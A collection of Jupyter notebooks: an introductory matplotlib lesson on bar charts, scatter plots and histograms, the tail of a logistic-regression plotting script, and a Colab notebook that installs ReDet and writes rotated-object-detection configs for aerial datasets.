Zn, mz, sz = normalize(Z_tst[:,1:], mz, sz)
Z_tst = np.concatenate((np.ones((n_tst,1)), Zn), axis=1)
# Fit model to data.
LogReg.fit(Z_tr, Y_tr)
# Classify training and test data
D_tr = LogReg.predict(Z_tr)
D_tst = LogReg.predict(Z_tst)
# Compute error rates
E_tr = D_tr!=Y_tr
E_tst = D_tst!=Y_tst
# Error rates
pe_tr = float(sum(E_tr)) / n_tr
pe_tst = float(sum(E_tst)) / n_tst
print('The final error rates are:')
print('- Training:', str(pe_tr))
print('- Test:', str(pe_tst))
# Compute Z_grid
Z_grid = poly.fit_transform(X_grid)
n_grid = Z_grid.shape[0]
Zn, mz, sz = normalize(Z_grid[:,1:], mz, sz)
Z_grid = np.concatenate((np.ones((n_grid,1)), Zn), axis=1)
# Compute the classifier output for all samples in the grid.
dd = LogReg.predict(Z_grid)
pp = LogReg.predict_proba(Z_grid)[:,1]
pp = pp.reshape(xx.shape)
# Paint output maps
pylab.rcParams['figure.figsize'] = 6, 6 # Set figure size
plt.plot(x0c0, x1c0,'r.', label=labels[c0])
plt.plot(x0c1, x1c1,'g+', label=labels[c1])
plt.xlabel('$x_' + str(ind[0]) + '$')
plt.ylabel('$x_' + str(ind[1]) + '$')
plt.axis('equal')
plt.contourf(xx, yy, pp, cmap=plt.cm.copper)
plt.legend(loc='best')
plt.contour(xx, yy, pp, levels=[0.5],
colors='b', linewidths=(3,))
plt.colorbar(CS, ticks=[0, 0.5, 1])
plt.show()
```
|
github_jupyter
|
<div class="alert alert-block alert-info">
<b><h1>ENGR 1330 Computational Thinking with Data Science </h1></b>
</div>
Copyright © 2021 Theodore G. Cleveland and Farhang Forghanparast
Last GitHub Commit Date:
# 15: The `matplotlib` package
- explore different types of plots
- user defined functions for specific plotting
---
## Objectives
- Demonstrate common plot types and their uses
- Define how to plot experimental data (observations) and theoretical data (model)
1. Marker conventions
2. Line conventions
3. Legends
---
### About `matplotlib`
Quoting from: https://matplotlib.org/tutorials/introductory/pyplot.html#sphx-glr-tutorials-introductory-pyplot-py
`matplotlib.pyplot` is a collection of functions that make matplotlib work like MATLAB. Each pyplot function makes some change to a figure: e.g., creates a figure, creates a plotting area in a figure, plots some lines in a plotting area, decorates the plot with labels, etc.
In `matplotlib.pyplot` various states are preserved across function calls, so that it keeps track of things like the current figure and plotting area, and the plotting functions are directed to the current axes (please note that "axes" here and in most places in the documentation refers to the axes part of a figure and not the strict mathematical term for more than one axis).
**Computational thinking (CT)** concepts involved are:
- `Decomposition` : Break a problem down into smaller pieces; separating plotting from other parts of analysis simplifies maintenace of scripts
- `Abstraction` : Pulling out specific differences to make one solution work for multiple problems; wrappers around generic plot calls enhances reuse
- `Algorithms` : A list of steps that you can follow to finish a task; Often the last step and most important to make professional graphics to justify the expense (of paying you to do engineering) to the client.
## Background
Data are not always numerical.
Data can music (audio files), or places on a map (georeferenced attributes files), images (various imge files, e.g. .png, jpeg)
They can also be categorical into which you can place individuals:
- The individuals are cartons of ice-cream, and the category is the flavor in the carton
- The individuals are professional basketball players, and the category is the player's team.
---
### Line Charts
A line chart or line plot or line graph or curve chart is a type of chart which displays information as a series of data points called 'markers' connected by straight line segments.
It is a basic type of chart common in many fields. It is similar to a scatter plot (below) except that the measurement points are **ordered** (typically by their x-axis value) and joined with straight line segments.
A line chart is often used to visualize a trend in data over intervals of time – a time series – thus the line is often drawn chronologically.
The x-axis spacing is sometimes tricky, hence line charts can unintentionally decieve - so be careful that it is the appropriate chart for your application.
We examined line charts in the prior lesson, so lets move on to other useful charts.
---
### Bar Graphs
Bar charts (graphs) are good display tools to graphically represent categorical information.
The bars are evenly spaced and of constant width.
The height/length of each bar is proportional to the `relative frequency` of the corresponding category.
`Relative frequency` is the ratio of how many things in the category to how many things in the whole collection.
The example below uses `matplotlib` to create a box plot for the ice cream analogy, the example is adapted from an example at https://www.geeksforgeeks.org/bar-plot-in-matplotlib/
```
ice_cream = {'Chocolate':16, 'Strawberry':5, 'Vanilla':9} # build a data model
import matplotlib.pyplot # the python plotting library
flavors = list(ice_cream.keys()) # make a list object based on flavors
cartons = list(ice_cream.values()) # make a list object based on carton count -- assumes 1:1 association!
myfigure = matplotlib.pyplot.figure(figsize = (10,5)) # generate a object from the figure class, set aspect ratio
# Built the plot
matplotlib.pyplot.bar(flavors, cartons, color ='teal', width = 0.4)
matplotlib.pyplot.xlabel("Flavors")
matplotlib.pyplot.ylabel("No. of Cartons in Stock")
matplotlib.pyplot.title("Current Ice Cream in Storage")
matplotlib.pyplot.show()
```
---
Lets tidy up the script so it is more understandable, a small change in the import statement makes a simpler to read (for humans) script - also changed the bar colors just 'cause!
```
ice_cream = {'Chocolate':16, 'Strawberry':5, 'Vanilla':9} # build a data model
import matplotlib.pyplot as plt # the python plotting library
flavors = list(ice_cream.keys()) # make a list object based on flavors
cartons = list(ice_cream.values()) # make a list object based on carton count -- assumes 1:1 association!
myfigure = plt.figure(figsize = (10,5)) # generate a object from the figure class, set aspect ratio
# Built the plot
plt.bar(flavors, cartons, color ='lightblue', width = 0.4)
plt.xlabel("Flavors")
plt.ylabel("No. of Cartons in Stock")
plt.title("Current Ice Cream in Storage")
plt.show()
```
---
Now lets deconstruct the script a bit:
ice_cream = {'Chocolate':16, 'Strawberry':5, 'Vanilla':9} # build a data model
import matplotlib.pyplot as plt # the python plotting library
flavors = list(ice_cream.keys()) # make a list object based on flavors
cartons = list(ice_cream.values()) # make a list object based on carton count -- assumes 1:1 association!
This part of the code creates a dictionary object, keys are the flavors, values are the carton counts (not the best way, but good for our learning needs). Next we import the python plotting library from `matplotlib` and name it **plt** to keep the script a bit easier to read.
Next we use the list method to create two lists from the dictionary, **flavors** and **cartons**. Keep this in mind plotting is usually done on lists, so we need to prepare the structures properly.
The next statement
myfigure = plt.figure(figsize = (10,5)) # generate a object from the figure class, set aspect ratio
Uses the figure class in **pyplot** from **matplotlib** to make a figure object named myfigure, the plot is built into this object. Every call to a method in `plt` adds content to `myfigure` until we send the instruction to render the plot (`plt.show()`)
The next portion of the script builds the plot:
plt.bar(flavors, cartons, color ='orange', width = 0.4) # Build a bar chart, plot series flavor on x-axis, plot series carton on y-axis. Make the bars orange, set bar width (units unspecified)
plt.xlabel("Flavors") # Label the x-axis as Flavors
plt.ylabel("No. of Cartons in Stock") # Label the x-axis as Flavors
plt.title("Current Ice Cream in Storage") # Title for the whole plot
This last statement renders the plot to the graphics device (probably localhost in the web browser)
plt.show()
---
Now lets add another set of categories to the plot and see what happens
```
ice_cream = {'Chocolate':16, 'Strawberry':5, 'Vanilla':9} # build a data model
eaters = {'Cats':6, 'Dogs':5, 'Ferrets':19} # build a data model
import matplotlib.pyplot as plt # the python plotting library
flavors = list(ice_cream.keys()) # make a list object based on flavors
cartons = list(ice_cream.values()) # make a list object based on carton count -- assumes 1:1 association!
animals = list(eaters.keys())
beasts = list(eaters.values())
myfigure = plt.figure(figsize = (10,5)) # generate a object from the figure class, set aspect ratio
# Built the plot
plt.bar(flavors, cartons, color ='orange', width = 0.4)
plt.bar(animals, beasts, color ='green', width = 0.4)
plt.xlabel("Flavors")
plt.ylabel("Counts: Cartons and Beasts")
plt.title("Current Ice Cream in Storage")
plt.show()
```
---
Now suppose we want horizontal bars we can search pyplot for such a thing. If one types horizontal bar chart into the pyplot search engine there is a link that leads to:

Which has the right look! If we examine the script there is a method called `barh` so lets try that.
```{note}
Use the search engines to find out things you need to accomplish a task.
```
```
ice_cream = {'Chocolate':16, 'Strawberry':5, 'Vanilla':9} # build a data model
eaters = {'Cats':6, 'Dogs':5, 'Ferrets':19} # build a data model
import matplotlib.pyplot as plt # the python plotting library
flavors = list(ice_cream.keys()) # make a list object based on flavors
cartons = list(ice_cream.values()) # make a list object based on carton count -- assumes 1:1 association!
animals = list(eaters.keys())
beasts = list(eaters.values())
myfigure = plt.figure(figsize = (10,5)) # generate a object from the figure class, set aspect ratio
# Built the plot
plt.barh(flavors, cartons, color ='orange')
plt.barh(animals, beasts, color ='green')
plt.xlabel("Flavors")
plt.ylabel("Counts: Cartons and Beasts")
plt.title("Current Ice Cream in Storage")
plt.show()
```
---
Now using pandas, we can build bar charts a bit easier.
```
import pandas as pd
my_data = {
"Flavor": ['Chocolate', 'Strawberry', 'Vanilla'],
"Number of Cartons": [16, 5, 9]
}
df = pd.DataFrame(my_data)
df.head()
df.plot.bar(x='Flavor', y='Number of Cartons', color='magenta' )
df.plot.bar(x='Flavor', y='Number of Cartons', color="red") # rotate the category labels
import numpy as np
import matplotlib.pyplot as plt
# creating the dataset
data = {'C':20, 'C++':15, 'Java':30,
'Python':35}
courses = list(data.keys())
values = list(data.values())
fig = plt.figure(figsize = (10, 5))
# creating the bar plot
plt.bar(courses, values, color ='maroon',
width = 0.4)
plt.xlabel("Courses offered")
plt.ylabel("No. of students enrolled")
plt.title("Students enrolled in different courses")
plt.show()
```
---
### Scatter Plots
A scatter plot (also called a scatterplot, scatter graph, scatter chart, scattergram, or scatter diagram) is a type of plot or mathematical diagram using Cartesian coordinates to display values for typically two variables for a set of data. If the points are coded (color/shape/size), one additional variable can be displayed. The data are displayed as a collection of points, each having the value of one variable determining the position on the horizontal axis and the value of the other variable determining the position on the vertical axis.
A scatter plot can be used either when one continuous variable that is under the control of the experimenter and the other depends on it or when both continuous variables are independent. If a parameter exists that is systematically incremented and/or decremented by the other, it is called the control parameter or independent variable and is customarily plotted along the horizontal axis. The measured or dependent variable is customarily plotted along the vertical axis. If no dependent variable exists, either type of variable can be plotted on either axis and a scatter plot will illustrate only the degree of correlation (not causation) between two variables.
A scatter plot can suggest various kinds of correlations between variables with a certain confidence interval. For example, weight and height, weight would be on y axis and height would be on the x axis.
Correlations may be positive (rising), negative (falling), or null (uncorrelated).
If the pattern of dots slopes from lower left to upper right, it indicates a positive correlation between the variables being studied.
If the pattern of dots slopes from upper left to lower right, it indicates a negative correlation.
A line of best fit (alternatively called 'trendline') can be drawn in order to study the relationship between the variables. An equation for the correlation between the variables can be determined by established best-fit procedures. For a linear correlation, the best-fit procedure is known as linear regression and is guaranteed to generate a correct solution in a finite time. No universal best-fit procedure is guaranteed to generate a solution for arbitrary relationships.
A scatter plot is also very useful when we wish to see how two comparable data sets agree and to show nonlinear relationships between variables.
Furthermore, if the data are represented by a mixture model of simple relationships, these relationships will be visually evident as superimposed patterns.
Scatter charts can be built in the form of bubble, marker, or/and line charts.
Much of the above is verbatim/adapted from: https://en.wikipedia.org/wiki/Scatter_plot
The example below uses a database table from [galton_subset.csv](http://54.243.252.9/engr-1330-webroot/1-Lessons/Lesson12/galton_subset.csv)
```
# Example 1. A data file containing heights of fathers, mothers, and sons is to be examined
df = pd.read_csv('galton_subset.csv')
df['child']= df['son'] ; df.drop('son', axis=1, inplace = True) # rename son to child - got to imagine there are some daughters
df.head()
# build some lists
daddy = df['father'] ; mommy = df['mother'] ; baby = df['child']
myfamily = plt.figure(figsize = (10, 10)) # build a square drawing canvass from figure class
plt.scatter(baby, daddy, c='red') # basic scatter plot
plt.show()
# Looks lousy, needs some labels
myfamily = plt.figure(figsize = (10, 10)) # build a square drawing canvass from figure class
plt.scatter(baby, daddy, c='red' , label='Father') # one plot series
plt.scatter(baby, mommy, c='blue', label='Mother') # two plot series
plt.xlabel("Child's height")
plt.ylabel("Parents' height")
plt.legend()
plt.show() # render the two plots
# Repeat in pandas - The dataframe already is built
df.plot.scatter(x="child", y="father")
ax = df.plot.scatter(x="child", y="father", c="red", label='Father')
df.plot.scatter(x="child", y="mother", c="blue", label='Mother', ax=ax)
ax.set_xlabel("Child's height")
ax.set_ylabel("Parents' Height")
df.plot.scatter(x="child", y="father")
```
---
## Histograms
Quoting from https://en.wikipedia.org/wiki/Histogram
"A histogram is an approximate representation of the distribution of numerical data. It was first introduced by Karl Pearson.[1] To construct a histogram, the first step is to "bin" (or "bucket") the range of values—that is, divide the entire range of values into a series of intervals—and then count how many values fall into each interval. The bins are usually specified as consecutive, non-overlapping intervals of a variable. The bins (intervals) must be adjacent, and are often (but not required to be) of equal size.
If the bins are of equal size, a rectangle is erected over the bin with height proportional to the frequency—the number of cases in each bin. A histogram may also be normalized to display "relative" frequencies. It then shows the proportion of cases that fall into each of several categories, with the sum of the heights equaling 1.
However, bins need not be of equal width; in that case, the erected rectangle is defined to have its area proportional to the frequency of cases in the bin. The vertical axis is then not the frequency but frequency density—the number of cases per unit of the variable on the horizontal axis. Examples of variable bin width are displayed on Census bureau data below.
As the adjacent bins leave no gaps, the rectangles of a histogram touch each other to indicate that the original variable is continuous.
Histograms give a rough sense of the density of the underlying distribution of the data, and often for density estimation: estimating the probability density function of the underlying variable. The total area of a histogram used for probability density is always normalized to 1. If the length of the intervals on the x-axis are all 1, then a histogram is identical to a relative frequency plot.
A histogram can be thought of as a simplistic kernel density estimation, which uses a kernel to smooth frequencies over the bins. This yields a smoother probability density function, which will in general more accurately reflect distribution of the underlying variable. The density estimate could be plotted as an alternative to the histogram, and is usually drawn as a curve rather than a set of boxes. Histograms are nevertheless preferred in applications, when their statistical properties need to be modeled. The correlated variation of a kernel density estimate is very difficult to describe mathematically, while it is simple for a histogram where each bin varies independently.
An alternative to kernel density estimation is the average shifted histogram, which is fast to compute and gives a smooth curve estimate of the density without using kernels.
The histogram is one of the seven basic tools of quality control.
Histograms are sometimes confused with bar charts. A histogram is used for continuous data, where the bins represent ranges of data, while a bar chart is a plot of categorical variables. Some authors recommend that bar charts have gaps between the rectangles to clarify the distinction."
The example below uses a database table from [top_movies.csv](http://54.243.252.9/engr-1330-webroot/1-Lessons/Lesson12/top_movies.csv)
```
import pandas as pd
df = pd.read_csv('top_movies.csv')
df.head()
df[["Gross"]].hist()
df[["Gross"]].hist(bins=100)
df.describe()
```
## Summary
- line charts (previous lesson)
- bar charts
- scatterplots
- histograms
## References
1. Grus, Joel (2015-04-14). Data Science from Scratch: First Principles with Python
(Kindle Locations 1190-1191). O'Reilly Media. Kindle Edition.
2. Call Expressions in "Adhikari, A. and DeNero, J. Computational and Inferential Thinking The Foundations of Data Science" https://www.inferentialthinking.com/chapters/03/3/Calls.html
3. Functions and Tables in "Adhikari, A. and DeNero, J. Computational and Inferential Thinking The Foundations of Data Science" https://www.inferentialthinking.com/chapters/08/Functions_and_Tables.html
4. Visualization in "Adhikari, A. and DeNero, J. Computational and Inferential Thinking The Foundations of Data Science" https://www.inferentialthinking.com/chapters/07/Visualization.html
5. Documentation; The Python Standard Library; 9. Numeric and Mathematical Modules https://docs.python.org/2/library/math.html
6. https://matplotlib.org/gallery/lines_bars_and_markers/horizontal_barchart_distribution.html?highlight=horizontal%20bar%20chart
7. https://www.geeksforgeeks.org/bar-plot-in-matplotlib/
## Addendum (Scripts that are Interactive)
:::{note}
The addendum is intended for in-class demonstration
:::
```
# python script to illustrate plotting
# CODE BELOW IS ADAPTED FROM:
# Grus, Joel (2015-04-14). Data Science from Scratch: First Principles with Python
# (Kindle Locations 1190-1191). O'Reilly Media. Kindle Edition.
#
from matplotlib import pyplot as plt # import the plotting library from matplotlibplt.show()
years = [1950, 1960, 1970, 1980, 1990, 2000, 2010] # define one list for years
gdp = [300.2, 543.3, 1075.9, 2862.5, 5979.6, 10289.7, 14958.3] # and another one for Gross Domestic Product (GDP)
plt.plot( years, gdp, color ='green', marker ='o', linestyle ='solid') # create a line chart, years on x-axis, gdp on y-axis
# what if "^", "P", "*" for marker?
# what if "red" for color?
# what if "dashdot", '--' for linestyle?
plt.title("Nominal GDP")# add a title
plt.ylabel("Billions of $")# add a label to the x and y-axes
plt.xlabel("Year")
plt.show() # display the plot
```
Now lets put the plotting script into a function so we can make line charts of any two numeric lists
```
def plotAline(list1,list2,strx,stry,strtitle): # plot list1 on x, list2 on y, xlabel, ylabel, title
from matplotlib import pyplot as plt # import the plotting library from matplotlibplt.show()
plt.plot( list1, list2, color ='green', marker ='o', linestyle ='solid') # create a line chart, years on x-axis, gdp on y-axis
plt.title(strtitle)# add a title
plt.ylabel(stry)# add a label to the x and y-axes
plt.xlabel(strx)
plt.show() # display the plot
return #null return
# wrapper
years = [1950, 1960, 1970, 1980, 1990, 2000, 2010] # define two lists years and gdp
gdp = [300.2, 543.3, 1075.9, 2862.5, 5979.6, 10289.7, 14958.3]
print(type(years[0]))
print(type(gdp[0]))
plotAline(years,gdp,"Year","Billions of $","Nominal GDP")
```
## Example
Use the plotting script and create a function that draws a straight line between two points.
```
def Line():
from matplotlib import pyplot as plt # import the plotting library from matplotlibplt.show()
x1 = input('Please enter x value for point 1')
y1 = input('Please enter y value for point 1')
x2 = input('Please enter x value for point 2')
y2 = input('Please enter y value for point 2')
xlist = [x1,x2]
ylist = [y1,y2]
plt.plot( xlist, ylist, color ='orange', marker ='*', linestyle ='solid')
#plt.title(strtitle)# add a title
plt.ylabel("Y-axis")# add a label to the x and y-axes
plt.xlabel("X-axis")
plt.show() # display the plot
return #null return
```
---
## Laboratory 15
**Examine** (click) Laboratory 15 as a webpage at [Laboratory 15.html](http://54.243.252.9/engr-1330-webroot/8-Labs/Lab15/Lab15.html)
**Download** (right-click, save target as ...) Laboratory 15 as a jupyterlab notebook from [Laboratory 15.ipynb](http://54.243.252.9/engr-1330-webroot/8-Labs/Lab15/Lab15.ipynb)
<hr><hr>
## Exercise Set 15
**Examine** (click) Exercise Set 15 as a webpage at [Exercise 15.html](http://54.243.252.9/engr-1330-webroot/8-Labs/Lab15/Lab15-TH.html)
**Download** (right-click, save target as ...) Exercise Set 15 as a jupyterlab notebook at [Exercise Set 7.1.ipynb](http://54.243.252.9/engr-1330-webroot/8-Labs/Lab15/Lab15-TH.ipynb)
## References
|
github_jupyter
|
<a href="https://colab.research.google.com/github/mmoghadam11/ReDet/blob/master/train_UCAS_AOD.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
```
from google.colab import drive
drive.mount('/content/drive')
#باشد tesla t4 باید
#اگر نبود در بخش ران تایم - منیج سشن - ترمینت شود و از اول کار شروع شود
!nvidia-smi
```
# pytorch نصب
```
# !pip install torch=1.3.1 torchvision cudatoolkit=10.0
!pip install torch==1.1.0 torchvision==0.3.0
```
# نصب ریپازیتوری
```
# !git clone https://github.com/dingjiansw101/AerialDetection.git
# !git clone https://github.com/csuhan/ReDet.git
!git clone https://github.com/mmoghadam11/ReDet.git
%cd /content/ReDet
! chmod +rx ./compile.sh
!./compile.sh
!python setup.py develop
# !pip install -e .
```
# نصب DOTA_devkit
```
! apt-get install swig
%cd /content/ReDet/DOTA_devkit
!swig -c++ -python polyiou.i
!python setup.py build_ext --inplace
```
# حال وقت آن است که تصاویری با اندازه ۱۰۲۴*۱۰۲۴ بسازیم و حجم نهیی آن بیش از ۳۵ گیگ خواهد بود
برای تولید تصاویر بریده شدهی ۱۰۲۴×۱۰۲۴ از فایل زیر استفاده میکنیم
--srcpath مکان تصاویر اصلی
--dstpath مکان تصاویر خروجی
**نکته : در صورت داشتن تصاویر بریده شده اجرای کد زیر نیاز نیست**
```
#آماده سازی dota_1024
# %cd /content/ReDet
# %run DOTA_devkit/prepare_dota1.py --srcpath /content/drive/Shareddrives/mahdiyar_SBU/data/dota --dstpath /content/drive/Shareddrives/mahdiyar_SBU/data/dota1024new
```
پس از تولید تصاویر ۱۰۲۴×۱۰۲۴ آنها را به ریپازیتوری پروژه **لینک** میکنیم
```
#برای مدیریت حافظ از سیمبلیک لینک کمک گرفتم
!mkdir '/content/ReDet/data'
# !mkdir '/content/AerialDetection/data/dota1_1024'
# !ln -s /content/drive/Shareddrives/mahdiyar_SBU/data/dota1_1024 /content/ReDet/data
# !ln -s /content/drive/Shareddrives/mahdiyar_SBU/data/dota1024new /content/ReDet/data
# !ln -s /content/drive/Shareddrives/mahdiyar_SBU/data/dota_redet /content/ReDet/data
!ln -s /content/drive/Shareddrives/mahdiyar_SBU/data/HRSC2016 /content/ReDet/data
!ln -s /content/drive/Shareddrives/mahdiyar_SBU/data/UCAS-AOD /content/ReDet/data
!ln -s /content/drive/Shareddrives/mahdiyar_SBU/data/UCAS_AOD659 /content/ReDet/data
# !ln -s /content/drive/MyDrive/++ /content/AerialDetection/data/dota1_1024/test1024
# !ln -s /content/drive/MyDrive/4++/trainval1024 /content/AerialDetection/data/dota1_1024/trainval1024
# !unlink /content/AerialDetection/data/dota1_1024/trainval1024
!ln -s /content/drive/MyDrive/4++/work_dirs /content/ReDet
```
# بررسی حافظه
```
#ممکن است بار اول بعد از ۲ دقیقه خطا دهد. اگر خطا داد دوباره همین دستور اجرا شود (بار دوم خطا نمیدهد)
import os
# print(len(os.listdir(os.path.join('/content/ReDet/data/dota1_1024/test1024/images'))))
print(len(os.listdir(os.path.join('/content/ReDet/data/dota1024new/test1024/images'))))
#میتوان فولدر را چک کرد(اختیاری)
!du -c /content/AerialDetection/data/dota1_1024
```
# نصب mmcv
```
%cd /content/ReDet
!pip install mmcv==0.2.13 #<=0.2.14
# !pip install mmcv==0.4.3
# !pip install mmcv==1.3.9
```
# **configs**
نکته ی بسیار مهم در کانفیگ مدل ها تایین زمان ثبت چکپوینت هنگام آموزش، مکان دیتاست میباشد
redet config
```
# %pycat /content/CG-Net/configs/DOTA/faster_rcnn_RoITrans_r101_fpn_baseline.py
%%writefile /content/ReDet/configs/ReDet/ReDet_re50_refpn_1x_dota1.py
############باید مکان دیتاست و اسم آن در فایل کانفیگ به روز شود در بالای خط دستور تغیر یک خط علامت # گزاشته ام
# model settings
model = dict(
type='ReDet',
############################################################################################################
# pretrained='work_dirs/ReResNet_pretrain/re_resnet50_c8_batch256-12933bc2.pth',
pretrained='/content/ReDet/work_dirs/ReResNet_pretrain/re_resnet50_c8_batch256-25b16846.pth',
############################################################################################################
backbone=dict(
type='ReResNet',
depth=50,
num_stages=4,
out_indices=(0, 1, 2, 3),
frozen_stages=1,
style='pytorch'),
neck=dict(
type='ReFPN',
in_channels=[256, 512, 1024, 2048],
out_channels=256,
num_outs=5),
rpn_head=dict(
type='RPNHead',
in_channels=256,
feat_channels=256,
anchor_scales=[8],
anchor_ratios=[0.5, 1.0, 2.0],
anchor_strides=[4, 8, 16, 32, 64],
target_means=[.0, .0, .0, .0],
target_stds=[1.0, 1.0, 1.0, 1.0],
loss_cls=dict(
type='CrossEntropyLoss', use_sigmoid=True, loss_weight=1.0),
loss_bbox=dict(type='SmoothL1Loss', beta=1.0 / 9.0, loss_weight=1.0)),
bbox_roi_extractor=dict(
type='SingleRoIExtractor',
roi_layer=dict(type='RoIAlign', out_size=7, sample_num=2),
out_channels=256,
featmap_strides=[4, 8, 16, 32]),
bbox_head=dict(
type='SharedFCBBoxHeadRbbox',
num_fcs=2,
in_channels=256,
fc_out_channels=1024,
roi_feat_size=7,
num_classes=16,
target_means=[0., 0., 0., 0., 0.],
target_stds=[0.1, 0.1, 0.2, 0.2, 0.1],
reg_class_agnostic=True,
with_module=False,
loss_cls=dict(
type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0),
loss_bbox=dict(type='SmoothL1Loss', beta=1.0, loss_weight=1.0)),
rbbox_roi_extractor=dict(
type='RboxSingleRoIExtractor',
roi_layer=dict(type='RiRoIAlign', out_size=7, sample_num=2),
out_channels=256,
featmap_strides=[4, 8, 16, 32]),
rbbox_head = dict(
type='SharedFCBBoxHeadRbbox',
num_fcs=2,
in_channels=256,
fc_out_channels=1024,
roi_feat_size=7,
num_classes=16,
target_means=[0., 0., 0., 0., 0.],
target_stds=[0.05, 0.05, 0.1, 0.1, 0.05],
reg_class_agnostic=False,
loss_cls=dict(
type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0),
loss_bbox=dict(type='SmoothL1Loss', beta=1.0, loss_weight=1.0))
)
# model training and testing settings
train_cfg = dict(
rpn=dict(
assigner=dict(
type='MaxIoUAssignerCy',
pos_iou_thr=0.7,
neg_iou_thr=0.3,
min_pos_iou=0.3,
ignore_iof_thr=-1),
sampler=dict(
type='RandomSampler',
num=256,
pos_fraction=0.5,
neg_pos_ub=-1,
add_gt_as_proposals=False),
allowed_border=0,
pos_weight=-1,
debug=False),
rpn_proposal=dict(
nms_across_levels=False,
nms_pre=2000,
nms_post=2000,
max_num=2000,
nms_thr=0.7,
min_bbox_size=0),
rcnn=[
dict(
assigner=dict(
type='MaxIoUAssignerCy',
pos_iou_thr=0.5,
neg_iou_thr=0.5,
min_pos_iou=0.5,
ignore_iof_thr=-1),
sampler=dict(
type='RandomSampler',
num=512,
pos_fraction=0.25,
neg_pos_ub=-1,
add_gt_as_proposals=True),
pos_weight=-1,
debug=False),
dict(
assigner=dict(
type='MaxIoUAssignerRbbox',
pos_iou_thr=0.5,
neg_iou_thr=0.5,
min_pos_iou=0.5,
ignore_iof_thr=-1),
sampler=dict(
type='RandomRbboxSampler',
num=512,
pos_fraction=0.25,
neg_pos_ub=-1,
add_gt_as_proposals=True),
pos_weight=-1,
debug=False)
])
test_cfg = dict(
rpn=dict(
# TODO: test nms 2000
nms_across_levels=False,
nms_pre=2000,
nms_post=2000,
max_num=2000,
nms_thr=0.7,
min_bbox_size=0),
rcnn=dict(
score_thr = 0.05, nms = dict(type='py_cpu_nms_poly_fast', iou_thr=0.1), max_per_img = 2000)
)
# dataset settings
dataset_type = 'DOTADataset'
########################################################################################################################
# data_root = '/content/ReDet/data/dota1_1024/'
# data_root = '/content/ReDet/data/dota_redet/'
data_root = '/content/ReDet/data/dota1024new/'
########################################################################################################################
img_norm_cfg = dict(
mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)
data = dict(
imgs_per_gpu=2,
workers_per_gpu=2,
train=dict(
type=dataset_type,
####################################################################################
ann_file=data_root + 'trainval1024/DOTA_trainval1024.json',
img_prefix=data_root + 'trainval1024/images',
img_scale=(1024, 1024),
img_norm_cfg=img_norm_cfg,
size_divisor=32,
flip_ratio=0.5,
with_mask=True,
with_crowd=True,
with_label=True),
val=dict(
type=dataset_type,
ann_file=data_root + 'trainval1024/DOTA_trainval1024.json',
img_prefix=data_root + 'trainval1024/images',
img_scale=(1024, 1024),
img_norm_cfg=img_norm_cfg,
size_divisor=32,
flip_ratio=0,
with_mask=True,
with_crowd=True,
with_label=True),
test=dict(
type=dataset_type,
#############################################################################################
ann_file=data_root + 'test1024/DOTA_test1024.json',
# ann_file=data_root + 'val1024/DOTA_val1024.json',
img_prefix=data_root + 'test1024/images',
# img_prefix=data_root + 'val1024/images',
img_scale=(1024, 1024),
img_norm_cfg=img_norm_cfg,
size_divisor=32,
flip_ratio=0,
with_mask=False,
with_label=False,
test_mode=True))
####################################################################################
# optimizer
optimizer = dict(type='SGD', lr=0.01, momentum=0.9, weight_decay=0.0001)
optimizer_config = dict(grad_clip=dict(max_norm=35, norm_type=2))
# learning policy
lr_config = dict(
policy='step',
warmup='linear',
warmup_iters=500,
warmup_ratio=1.0 / 3,
step=[8, 11])
checkpoint_config = dict(interval=12)
# yapf:disable
log_config = dict(
interval=50,
hooks=[
dict(type='TextLoggerHook'),
####################################################################################
dict(type='TensorboardLoggerHook')
])
# yapf:enable
# runtime settings
total_epochs = 12
dist_params = dict(backend='nccl')
log_level = 'INFO'
work_dir = './work_dirs/ReDet_re50_refpn_1x_dota1'
load_from = None
resume_from = None
workflow = [('train', 1)]
############################################################################################
# map: 0.7625466854468368
# classaps: [88.78856374 82.64427543 53.97022743 73.99912889 78.12618094 84.05574561
# 88.03844621 90.88860051 87.78155929 85.75268025 61.76308434 60.39378975
# 75.9600904 68.06737265 63.59028274]
```
**HRSC2016** ReDet
```
%%writefile /content/ReDet/configs/ReDet/ReDet_re50_refpn_3x_hrsc2016.py
# model settings
model = dict(
type='ReDet',
pretrained='/content/ReDet/work_dirs/ReResNet_pretrain/re_resnet50_c8_batch256-25b16846.pth',
backbone=dict(
type='ReResNet',
depth=50,
num_stages=4,
out_indices=(0, 1, 2, 3),
frozen_stages=1,
style='pytorch'),
neck=dict(
type='ReFPN',
in_channels=[256, 512, 1024, 2048],
out_channels=256,
num_outs=5),
rpn_head=dict(
type='RPNHead',
in_channels=256,
feat_channels=256,
anchor_scales=[8],
anchor_ratios=[0.5, 1.0, 2.0],
anchor_strides=[4, 8, 16, 32, 64],
target_means=[.0, .0, .0, .0],
target_stds=[1.0, 1.0, 1.0, 1.0],
loss_cls=dict(
type='CrossEntropyLoss', use_sigmoid=True, loss_weight=1.0),
loss_bbox=dict(type='SmoothL1Loss', beta=1.0 / 9.0, loss_weight=1.0)),
bbox_roi_extractor=dict(
type='SingleRoIExtractor',
roi_layer=dict(type='RoIAlign', out_size=7, sample_num=2),
out_channels=256,
featmap_strides=[4, 8, 16, 32]),
bbox_head=dict(
type='SharedFCBBoxHeadRbbox',
num_fcs=2,
in_channels=256,
fc_out_channels=1024,
roi_feat_size=7,
num_classes=2,
target_means=[0., 0., 0., 0., 0.],
target_stds=[0.1, 0.1, 0.2, 0.2, 0.1],
reg_class_agnostic=True,
with_module=False,
loss_cls=dict(
type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0),
loss_bbox=dict(type='SmoothL1Loss', beta=1.0, loss_weight=1.0)),
rbbox_roi_extractor=dict(
type='RboxSingleRoIExtractor',
roi_layer=dict(type='RiRoIAlign', out_size=7, sample_num=2),
out_channels=256,
featmap_strides=[4, 8, 16, 32]),
rbbox_head = dict(
type='SharedFCBBoxHeadRbbox',
num_fcs=2,
in_channels=256,
fc_out_channels=1024,
roi_feat_size=7,
num_classes=2,
target_means=[0., 0., 0., 0., 0.],
target_stds=[0.05, 0.05, 0.1, 0.1, 0.05],
reg_class_agnostic=False,
loss_cls=dict(
type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0),
loss_bbox=dict(type='SmoothL1Loss', beta=1.0, loss_weight=1.0))
)
# model training and testing settings
